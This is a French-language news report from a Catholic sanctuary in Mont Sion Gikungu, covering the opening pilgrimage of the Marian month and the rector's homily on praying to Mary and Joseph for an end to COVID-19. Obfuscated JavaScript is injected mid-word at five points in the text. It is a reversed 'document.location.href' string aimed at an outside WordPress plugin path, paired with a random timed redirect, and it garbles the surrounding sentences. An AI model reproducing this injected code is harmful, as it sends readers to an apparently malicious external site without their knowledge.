Au Sanctuaire de la Reine de la Paix et Réconciliation de Mont Sion Gikungu, le cinquième Dimanche de Pâques avec le premier dimanche du mois de mai qui a été dédié à la vierge Marie. C’est en ce même qu’il y a eu un pèlerinage d’ouverture du mois marial. La liturgie du jour était tournée vers la prière pour l’Eglise, les nations, les nécessiteux et la demande de l’intercession de la vierge Marie pour la fin de la pandémie du covid-19. Le programme des activités de la journée a débuté depuis 8h00 par la célébration pénitentielle et la récitation du Rosaire. La sainte Messe de 1Oh a été présidée par le Père Herménégilde COYITUNGIYE, Recteur du Sanctuaire ; l’animation du chant a été conjointement assurée par les chorales Saint Nicholas de Flue et Sainte Famille. Au cours de la procession du début de la Messe, l’image de la Vierge Marie était portée par 4 Frères Bene Yozefu.  Pour la liturgie de Parole, la première lecture était tirée du Livre des Actes des Apôtres 9, 26-31, la deuxième lecture est de l’Epitre de 1Jn3, 18-24 et l’Evangile selon Saint Jean15, 1-8.

Le célébrant principal de la Messe du jour, le Père Recteur, a chaleureusement accueilli les Pèlerins venus nombreux au nom de Jésus, Marie et Joseph. Ses salutations ont été adressées   aux membres du Mouvement Marial. Il n’a pas non plus manqué de souhaiter joyeuses Pâques à ceux qui n’étaient pas venus au Sanctuaire depuis la fête de Pâques dernier.  A tous, le Père Recteur a déclaré qu’on était venu chantant de joie en ce début du Moi Marial avec l’intention consacrer notre pays à Dieu.  Il a aussi annoncé que c’est un moi où le Pape François a appelé les Chrétiens pour le Marathon de prière avec la Vierge Marie pour implorer à Dieu d’arrêter de la pandémie du covid-19.  Il a alors rassuré que même si les chercheurs et scientifiques peinent toujours à trouver solution à cette maladie, Marie, elle, y parviendra sans toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doute. Il a enfin fait savoir qu’à partir de Lundi le 3 Mai, trente et un Sanctuaires Mariales à travers le monde allaient alterner dans la prière tous les soirs pour demander la fin de covid-19. Et de déclarer qu’au Sanctuaire Marial de Mont Sion Gikungu il y aura toujours la prière du Chapelet à partir de 18h et beaucoup d’autres sacrifices. Le Père COYITUNGIYE a aussi fait savoir que le problème n’est pas seulement covid, mais il y a toujours des entraves sur le chemin de la paix et la réconciliation, et c’est la raison pour laquelle nous étions venus prier à Marie et Joseph, pour qu’ils nous aident à assoir la paix et la réconciliation parmi nous.

Homélie

Saluant les Pèlerins toujours par Jésus, Marie et Joseph, le Père Recteur a fait savoir qu’avec le mois de Mai on a commencé le mois dédié à la Vierge Marie. C’était la deuxième fois qu’on faisait ce pèlerinage dans des conditions de restriction à cause de la pandémie de covid-19, mais qu’on a toujours de l’espoir avec notre Pape que la Vierge Marie peut nous en sortir.  Le Père célébrant a alors annoncé que chaque fois que nous prononçons nos prières et louanges à Marie, il y a une petite phrase qui est dedans, Priez pour nous. C’est le mot principal, le mot de base. Et bien Marie sait très bien que son Fils est ressuscité, et peut effacer tout le mal de la face de la terre. Seulement, Marie nous dit toujours en retour, « Faites tout ce qu’il vous dira ».  Dans ces moments difficiles, nous avons alors l’assurance que nous pouvons faire face à nos problèmes et sortir vainqueurs grâce à Jésus. Père Kentenich souligne aussi que pendant ce mois de Mai nous sommes appelés à faire plus de sacrifices et à prier Marie. Et les Catholiques du monde entier l’ont compris, puisque depuis la visitation de Marie par l’Archange Gabriel, les louanges à Marie n’ont jamais cessé.

Le Pape Paul VI nous dit, « La Vierge Marie nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne la parole de l’espoir, …. Parole de la victoire de la vie sur la mort ».  Dans ces derniers jours Marie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit se manifester dans notre vie. Mais aussi nous commençons ce mois avec Joseph, comme le premier Mai l’on a célébré Saint Joseph et le patron des travailleurs. Nous entrons alors dans ce moi avec la Sainte Famille. Marie est toujours avec Joseph dans ses intercessions pour nous, et ils nous protègent dans tout ce qui nous arrive. « La première préoccupation de Marie et Joseph est de nous éduquer », a –t- il martelé.

Nous voyons Marie comme celle qui a accueilli la Parole de Dieu, celle qui demeure en Jésus et en qui Jésus demeure et qui porte du fruit ; « Je suis la vigne, vous êtes les sarments: celui qui demeure en moi  et en qui je demeure, celui-là portera du fruit en abondance car, en dehors de moi vous ne pouvez rien faire » Jn15, 5.  Marie demeure en  Dieu. Pour vérifier que ces mots de Jésus sont vrais il faut regarder Marie.  Nous comprenons alors que quand Jésus nous dit, « Si vous demeurez en moi et que mes paroles demeurent en vous, vous demanderez ce que vous voudrez et cela vous arrivera » Jn15, 7 ; Marie peut nous obtenir tout de Dieu. Le premier signe de ce témoignage nous le voyons dans les noces de Cana en Galilée, quand par la prière de Marie l’eau a été changée en vin par Jésus.  Nous croyons alors que par la prière de Marie même cette pandémie de covid peut être arrêtée immédiatement. Mais il faut toujours que nous participions par notre foi, puisque parfois nous sommes des obstacles aux prières de Marie pour nous.  La condition est que nous accueillions et gardions la parole de Dieu, a fait savoir Père Recteur.

La Vierge Marie demeure en Dieu et Dieu en elle, elle a accueilli Dieu la première, de manière plus spéciale et L’a toujours gardé. Et toi, est-ce que tu as Dieu en toi ? Si on cherchait les signes de la présence de Dieu en toi, on les trouverait ? Pourtant les signes montrant l’absence de Dieu sont souvent nombreux : l’injustice, le mensonge, la débauche, les poisons et l’empoisonnement, la pauvreté autour de toi, considération du péché comme normal, etc. Mais c’est dans ces moments que Marie vient nous aider à nous réconcilier avec Jésus. Et pourtant, si Marie te dit dès ce Lundi (3Mai), « tout ce Jésus vous dira faites-le », tu vas l’accepter.  Il faut croire qu’avec Marie tout est possible, même Covid-19 peut s’arrêter.

Père Herménégilde a rappelé que Joseph a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docilement obéi dans le silence à la parole de Dieu et qu’avec Marie, Joseph nous montre ce que nous devons faire pour que tout aille bien. Le Pape François dit que tous ces gens qui sont là et qui prient pour les autres et font des sacrifices en silence pour que les choses aillent bien ont les vertus de Joseph. Pourtant les choses sont différentes dans le monde d’aujourd’hui.  Toute personne qui fait même une petite chose pour les autres, fait beaucoup de bruits : quelqu’un qui distribue quelques kilogrammes de riz ou de haricots aux pauvres en fait une telle publicité qu’on trouve sur les media et réseaux sociaux comme des merveilles. Et souvent ces aides viennent des biens mal acquis, des biens publics détournés.

Père Recteur a terminé son homélie en soulignant la saveur de la parole de Dieu du jour,  et  que nous devons en tirer la saveur en la lisant dans la vie de Marie et Joseph.  Il a alors appelé les Pèlerins à offrir à Marie et Joseph les nécessiteux, les malheureux et malades, ceux qui font des recherches pour arrêter les maladies, et surtout ceux qui vivent dans le mal quelques fois sans y faire attention attendant le dernier jour, mais aussi ces victimes des injustices qui continuent à se plaindre au lieu de prendre la décision de partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner.  « Ce qui glorifie mon Père, est que vous portiez du fruit en abondance et que vous soyez pour moi des disciples » Jn15, 8, par ce verset le Père COYITUNGIYE a alors clôturé son homélie disant qu’on était justement venu pour montrer à Marie et Joseph là où on a de problèmes, et qu’ils nous aideront à porter alors beaucoup de fruits.

Pendant l’offertoire, à côté des offrandes d’autel, les chrétiens de Mont Sion Gikungu ont offert des signes visibles : Bible et chapelet portés par un couple, comme signe d’invitation à renforcer la prière et la lecture de la parole de Dieu dans les familles ; et Bouquets de fleurs constituées des lys et roses portés par une Sœur des Bene Maria, pour offrir en cette année de Saint Joseph les symboles pour demander les qualités de Saint Joseph et ce désir d’imiter ses vertus.

La Messe s’est terminée par une procession vers le Sanctuaire où on a adressé des prières à Marie pour intercéder pour nous dans des moments difficiles, prière de couronnement de la Vierge et on s’est consacré à Joseph notre Saint Patron, avant la bénédiction solennelle.

Fulgence NDAYIZEYE